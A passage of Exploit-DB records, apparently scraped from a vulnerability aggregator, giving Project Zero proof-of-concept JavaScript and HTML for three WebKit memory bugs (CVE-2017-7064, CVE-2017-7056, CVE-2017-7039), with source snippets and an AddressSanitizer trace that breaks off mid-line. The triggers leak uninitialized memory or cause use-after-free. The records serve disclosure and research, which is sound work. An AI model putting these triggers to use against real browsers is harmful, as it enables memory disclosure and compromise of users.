"exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42375", "href": "https://www.exploit-db.com/exploits/42375/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1236\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\n-->\r\n\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42375/"}, {"lastseen": "2017-07-25T21:42:26", "description": "WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling. CVE-2017-7056. Dos exploit for Multiple platform", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42376", "href": "https://www.exploit-db.com/exploits/42376/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262\r\n\r\nHere is a snippet of ArgumentsEliminationPhase::transform\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\nPoC:\r\n-->\r\n\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42376/"}, {"lastseen": "2017-07-24T19:42:14", "description": "WebKit - 'WebCore::Node::nextSibling' Use-After-Free. CVE-2017-7039. Dos exploit for Multiple platform. Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::Node::nextSibling' Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42362", "href": "https://www.exploit-db.com/exploits/42362/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241\r\n\r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n #24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)\r\n #25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)\r\n #26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)\r\n #27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)\r\n #28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)\r\n #29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)\r\n #30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)\r\n #31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)\r\n #32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)\r\n #33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)\r\n #34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)\r\n #35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type 